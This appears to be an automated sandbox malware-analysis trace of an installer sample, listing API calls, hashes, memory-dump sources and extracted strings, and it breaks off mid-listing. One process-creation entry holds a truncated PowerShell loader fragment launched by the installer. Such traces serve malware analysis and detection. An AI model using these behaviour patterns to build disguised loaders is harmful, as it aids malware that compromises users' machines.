                                • Instruction ID: 0d77a24040528495e1d5683a333844bda4a24a81b27895c3293bddb668a77566
                                • Opcode Fuzzy Hash: 11d7c7005d0d3054af3b9be2f3a82004ed33d4240877e49ff836af06555e7eff
                                • Instruction Fuzzy Hash: 20E0EC3221065EABDF509F55DC00EEB7B6CEB05360F004837F965E2150D631EA219BE9
                                APIs
                                • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040338D,00000000,00000000,004031B7,000000FF,00000004,00000000,00000000,00000000), ref: 00405EAC
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: FileRead
                                • String ID:
                                • API String ID: 2738559852-0
                                • Opcode ID: 62c77d97b5b576e4a72063145ecbe95ee4dab9ee0079c0f8f42f41321a19b9da
                                • Instruction ID: c4f2c5db2c8838af9825f3b875f3a0ad88d5b51994199861a780369f0be58439
                                • Opcode Fuzzy Hash: 62c77d97b5b576e4a72063145ecbe95ee4dab9ee0079c0f8f42f41321a19b9da
                                • Instruction Fuzzy Hash: E4E04F32210619ABDF109F60DC04EAB3B6CEB00351F000432F954E2140D230E9118AE4
                                APIs
                                • GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402440
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: PrivateProfileString
                                • String ID:
                                • API String ID: 1096422788-0
                                • Opcode ID: 2bf3f178d14cd4560723ce1317423526718b1f73ef5608a9eed72cfac383f117
                                • Instruction ID: 16d05768d70be94792168112439c0a82a49a1a045ba9b991e9e4b5323ac17763
                                • Opcode Fuzzy Hash: 2bf3f178d14cd4560723ce1317423526718b1f73ef5608a9eed72cfac383f117
                                • Instruction Fuzzy Hash: 2CE04F3190821DBAEB007FA08F09AAD2A69AF01720F10002AFA507A0D1E6B98583971D
                                APIs
                                • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,?,?,?,?,?,004061A1,?,?,?,?,00000000,?), ref: 00406137
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: Open
                                • String ID:
                                • API String ID: 71445658-0
                                • Opcode ID: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                • Instruction ID: 4278cf0171cf0b678593f71500b3925c4415a8e9ce87015ff7d519d2eb21bae6
                                • Opcode Fuzzy Hash: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                • Instruction Fuzzy Hash: BCD0123204020DBBDF119E90AD01FAB3B1DEB48350F014826FE07A8091D775D570A724
                                APIs
                                • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015CD
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: AttributesFile
                                • String ID:
                                • API String ID: 3188754299-0
                                • Opcode ID: 93233afc89f5dcba0ebf1b763322780f207c5d8236f145893b8d4ae7afdee906
                                • Instruction ID: 7d2cdf6a56bb8b2c4d8e447006d96498fe5724c9cded2cbb68f68f822827988b
                                • Opcode Fuzzy Hash: 93233afc89f5dcba0ebf1b763322780f207c5d8236f145893b8d4ae7afdee906
                                • Instruction Fuzzy Hash: BED01732708214DBDF60DBA8AF08A9FB3A4AB10328B20413BD211F21D1D6B9C5469B2D
                                APIs
                                • SendMessageA.USER32(0001043C,00000000,00000000,00000000), ref: 0040438B
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: MessageSend
                                • String ID:
                                • API String ID: 3850602802-0
                                • Opcode ID: a0eb0ef1ff6dd579934d65901b95a1f3a9c939147581cb3b9152e9d48dc718fa
                                • Instruction ID: f513ac05e70e3adf76b651c0ca8ec4e95b66ff2fdc1b64d79a05bcbbe3c40a95
                                • Opcode Fuzzy Hash: a0eb0ef1ff6dd579934d65901b95a1f3a9c939147581cb3b9152e9d48dc718fa
                                • Instruction Fuzzy Hash: 4DC09BB17403027BFE209B529E45F077798D790700F1554397754F54D0C774D410D62C
                                APIs
                                • SendMessageA.USER32(00000028,?,00000001,00404192), ref: 00404370
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: MessageSend
                                • String ID:
                                • API String ID: 3850602802-0
                                APIs
                                • ShellExecuteExA.SHELL32(?,00404774,?), ref: 00405978
                                Similarity
                                • API ID: ExecuteShell
                                • String ID:
                                • API String ID: 587946157-0
                                APIs
                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004030F6,?,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 0040339E
                                Similarity
                                • API ID: FilePointer
                                • String ID:
                                • API String ID: 973152223-0
                                APIs
                                • KiUserCallbackDispatcher.NTDLL(?,0040412B), ref: 00404359
                                Similarity
                                • API ID: CallbackDispatcherUser
                                • String ID:
                                • API String ID: 2492992576-0
                                APIs
                                  • Part of subcall function 004053D1: lstrlenA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsz930C.tmp\,00000000,00422E40,755723A0,?,?,?,?,?,?,?,?,?,004032C3,00000000,?), ref: 0040540A
                                  • Part of subcall function 004053D1: lstrlenA.KERNEL32(004032C3,Remove folder: C:\Users\user\AppData\Local\Temp\nsz930C.tmp\,00000000,00422E40,755723A0,?,?,?,?,?,?,?,?,?,004032C3,00000000), ref: 0040541A
                                  • Part of subcall function 004053D1: lstrcatA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsz930C.tmp\,004032C3,004032C3,Remove folder: C:\Users\user\AppData\Local\Temp\nsz930C.tmp\,00000000,00422E40,755723A0), ref: 0040542D
                                  • Part of subcall function 004053D1: SetWindowTextA.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsz930C.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsz930C.tmp\), ref: 0040543F
                                  • Part of subcall function 004053D1: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405465
                                  • Part of subcall function 004053D1: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040547F
                                  • Part of subcall function 004053D1: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040548D
                                  • Part of subcall function 00405926: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042BC90,?,"$Beseen=gc -raw ',"$Beseen=gc -raw ',?,Bje gka",00000000), ref: 0040594F
                                  • Part of subcall function 00405926: CloseHandle.KERNEL32(?), ref: 0040595C
                                • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FE5
                                  • Part of subcall function 0040672A: WaitForSingleObject.KERNEL32(?,00000064), ref: 0040673B
                                  • Part of subcall function 0040672A: GetExitCodeProcess.KERNEL32(?,?), ref: 0040675D
                                  • Part of subcall function 004061EB: wsprintfA.USER32 ref: 004061F8
                                Similarity
                                • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                • String ID:
                                • API String ID: 2972824698-0
                                APIs
                                • GetDlgItem.USER32(?,000003FB), ref: 0040480E
                                • SetWindowTextA.USER32(00000000,?), ref: 00404838
                                • SHBrowseForFolderA.SHELL32(?,00429860,?), ref: 004048E9
                                • CoTaskMemFree.OLE32(00000000), ref: 004048F4
                                • lstrcmpiA.KERNEL32(Remove folder: ,0042A488), ref: 00404926
                                • lstrcatA.KERNEL32(?,Remove folder: ), ref: 00404932
                                • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404944
                                  • Part of subcall function 00405987: GetDlgItemTextA.USER32(?,?,00000400,0040497B), ref: 0040599A
                                  • Part of subcall function 00406587: CharNextA.USER32(0000000C,*?|<>/":,00000000,?,75573410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\MPkM9Dd99B.exe",004033B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 004065DF
                                  • Part of subcall function 00406587: CharNextA.USER32(0000000C,0000000C,0000000C,00000000,?,75573410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\MPkM9Dd99B.exe",004033B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 004065EC
                                  • Part of subcall function 00406587: CharNextA.USER32(0000000C,?,75573410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\MPkM9Dd99B.exe",004033B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 004065F1
                                  • Part of subcall function 00406587: CharPrevA.USER32(0000000C,0000000C,75573410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\MPkM9Dd99B.exe",004033B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 00406601
                                • GetDiskFreeSpaceA.KERNEL32(00429458,?,?,0000040F,?,00429458,00429458,?,00000001,00429458,?,?,000003FB,?), ref: 00404A02
                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404A1D
                                  • Part of subcall function 00404B76: lstrlenA.KERNEL32(0042A488,0042A488,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A91,000000DF,00000000,00000400,?), ref: 00404C14
                                  • Part of subcall function 00404B76: wsprintfA.USER32 ref: 00404C1C
                                  • Part of subcall function 00404B76: SetDlgItemTextA.USER32(?,0042A488), ref: 00404C2F
                                Strings
                                Similarity
                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                • String ID: A$C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth$Remove folder: $Under i$
                                • API String ID: 2624150263-95278080
                                APIs
                                • CoCreateInstance.OLE32(0040851C,?,00000001,0040850C,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040221D
                                • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,0040850C,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004022CF
                                Strings
                                • C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\Forsmgtede, xrefs: 0040225D
                                Similarity
                                • API ID: ByteCharCreateInstanceMultiWide
                                • String ID: C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\Forsmgtede
                                • API String ID: 123533781-3557324615
                                APIs
                                • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004027DE
                                Similarity
                                • API ID: FileFindFirst
                                • String ID:
                                • API String ID: 1974802433-0
                                APIs
                                • GetDlgItem.USER32(?,000003F9), ref: 00404D49
                                • GetDlgItem.USER32(?,00000408), ref: 00404D56
                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404DA5
                                • LoadImageA.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404DBC
                                • SetWindowLongA.USER32(?,000000FC,00405345), ref: 00404DD6
                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404DE8
                                • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404DFC
                                • SendMessageA.USER32(?,00001109,00000002), ref: 00404E12
                                • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404E1E
                                • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404E2E
                                • DeleteObject.GDI32(00000110), ref: 00404E33
                                • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404E5E
                                • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404E6A
                                • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404F04
                                • SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404F34
                                  • Part of subcall function 00404362: SendMessageA.USER32(00000028,?,00000001,00404192), ref: 00404370
                                • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404F48
                                • GetWindowLongA.USER32(?,000000F0), ref: 00404F76
                                • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404F84
                                • ShowWindow.USER32(?,00000005), ref: 00404F94
                                • SendMessageA.USER32(?,00000419,00000000,?), ref: 0040508F
                                • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 004050F4
                                • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00405109
                                • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 0040512D
                                • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 0040514D
                                • ImageList_Destroy.COMCTL32(?), ref: 00405162
                                • GlobalFree.KERNEL32(?), ref: 00405172
                                • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 004051EB
                                • SendMessageA.USER32(?,00001102,?,?), ref: 00405294
                                • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 004052A3
                                • InvalidateRect.USER32(?,00000000,00000001), ref: 004052CE
                                • ShowWindow.USER32(?,00000000), ref: 0040531C
                                • GetDlgItem.USER32(?,000003FE), ref: 00405327
                                • ShowWindow.USER32(00000000), ref: 0040532E
                                Strings
                                Similarity
                                • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                • String ID: $M$N
                                • API String ID: 2564846305-813528018
                                • Opcode ID: ad365de84642ecf9d5d1417fba7f9e12be9bda6c8d0ac92067bf52711ca0feab
                                • Instruction ID: b1cb089e499fd84ad02b8b6dcb50706d58213328e80d7969948961eab3192630
                                • Opcode Fuzzy Hash: ad365de84642ecf9d5d1417fba7f9e12be9bda6c8d0ac92067bf52711ca0feab
                                • Instruction Fuzzy Hash: B1027DB0A00609AFDF209F94DD45AAE7BB5FB44354F50817AFA10BA2E1C7789D42CF58
                                APIs
                                • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00404523
                                • GetDlgItem.USER32(00000000,000003E8), ref: 00404537
                                • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00404555
                                • GetSysColor.USER32(?), ref: 00404566
                                • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404575
                                • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404584
                                • lstrlenA.KERNEL32(?), ref: 00404587
                                • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404596
                                • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004045AB
                                • GetDlgItem.USER32(?,0000040A), ref: 0040460D
                                • SendMessageA.USER32(00000000), ref: 00404610
                                • GetDlgItem.USER32(?,000003E8), ref: 0040463B
                                • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 0040467B
                                • LoadCursorA.USER32(00000000,00007F02), ref: 0040468A
                                • SetCursor.USER32(00000000), ref: 00404693
                                • LoadCursorA.USER32(00000000,00007F00), ref: 004046A9
                                • SetCursor.USER32(00000000), ref: 004046AC
                                • SendMessageA.USER32(00000111,00000001,00000000), ref: 004046D8
                                • SendMessageA.USER32(00000010,00000000,00000000), ref: 004046EC
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                • String ID: N$Remove folder: $cD@
                                • API String ID: 3103080414-2623635553
                                • Opcode ID: 0d552c78708d8b6c3e6a9e133e2a55d80eb6ec1b6100387134d0e82e0d806a6f
                                • Instruction ID: 43684ccacc2d8fb7b4e0a1eb44f66cc69a0b9750f41782283b4d1566cbdab7d9
                                • Opcode Fuzzy Hash: 0d552c78708d8b6c3e6a9e133e2a55d80eb6ec1b6100387134d0e82e0d806a6f
                                • Instruction Fuzzy Hash: 106193B1A00209BBDB109F61DD45F6A3BA9FB84754F10443AFB057B1D1C7B8A951CF98
                                APIs
                                • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                • BeginPaint.USER32(?,?), ref: 00401047
                                • GetClientRect.USER32(?,?), ref: 0040105B
                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                • DeleteObject.GDI32(?), ref: 004010ED
                                • CreateFontIndirectA.GDI32(?), ref: 00401105
                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                • DrawTextA.USER32(00000000,Ifrende Setup,000000FF,00000010,00000820), ref: 00401156
                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                • DeleteObject.GDI32(?), ref: 00401165
                                • EndPaint.USER32(?,?), ref: 0040116E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                • String ID: F$Ifrende Setup
                                • API String ID: 941294808-3140563244
                                • Opcode ID: 036095489b744d328a0284f3af7f80ab3f3a11b0609df675fc3b160fbcb80c66
                                • Instruction ID: 3ddd31971ff36fa992edb7b0d2f538087f25d398410520a6441e316a3758f4e4
                                • Opcode Fuzzy Hash: 036095489b744d328a0284f3af7f80ab3f3a11b0609df675fc3b160fbcb80c66
                                • Instruction Fuzzy Hash: 2E419C71800209AFCB059F95CE459BFBBB9FF44314F00842EF591AA1A0CB349955DFA4
                                APIs
                                • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00406087,?,?), ref: 00405F27
                                • GetShortPathNameA.KERNEL32(?,0042C218,00000400), ref: 00405F30
                                  • Part of subcall function 00405D85: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D95
                                  • Part of subcall function 00405D85: lstrlenA.KERNEL32(00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405DC7
                                • GetShortPathNameA.KERNEL32(?,0042C618,00000400), ref: 00405F4D
                                • wsprintfA.USER32 ref: 00405F6B
                                • GetFileSize.KERNEL32(00000000,00000000,0042C618,C0000000,00000004,0042C618,?,?,?,?,?), ref: 00405FA6
                                • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405FB5
                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FED
                                • SetFilePointer.KERNEL32(0040A3D0,00000000,00000000,00000000,00000000,0042BE18,00000000,-0000000A,0040A3D0,00000000,[Rename],00000000,00000000,00000000), ref: 00406043
                                • GlobalFree.KERNEL32(00000000), ref: 00406054
                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040605B
                                  • Part of subcall function 00405E20: GetFileAttributesA.KERNELBASE(00000003,00402F71,C:\Users\user\Desktop\MPkM9Dd99B.exe,80000000,00000003,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00405E24
                                  • Part of subcall function 00405E20: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00405E46
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                • String ID: %s=%s$[Rename]
                                • API String ID: 2171350718-1727408572
                                • Opcode ID: 3ee2702b906f9f9870be181a98f9c6ca9cabf97a2df393811b734ddb71ed24d1
                                • Instruction ID: da8ce3bfdf00fcfed17b5edaf8d9799a0bf0ff3a482d4f6cc2fc7d52a36fe9c3
                                • Opcode Fuzzy Hash: 3ee2702b906f9f9870be181a98f9c6ca9cabf97a2df393811b734ddb71ed24d1
                                • Instruction Fuzzy Hash: 3D3135312407117BC220AB65AC88F6B3A5CDF41758F16003BFA02F72D2DE7C98558ABD
                                APIs
                                • CharNextA.USER32(0000000C,*?|<>/":,00000000,?,75573410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\MPkM9Dd99B.exe",004033B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 004065DF
                                • CharNextA.USER32(0000000C,0000000C,0000000C,00000000,?,75573410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\MPkM9Dd99B.exe",004033B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 004065EC
                                • CharNextA.USER32(0000000C,?,75573410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\MPkM9Dd99B.exe",004033B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 004065F1
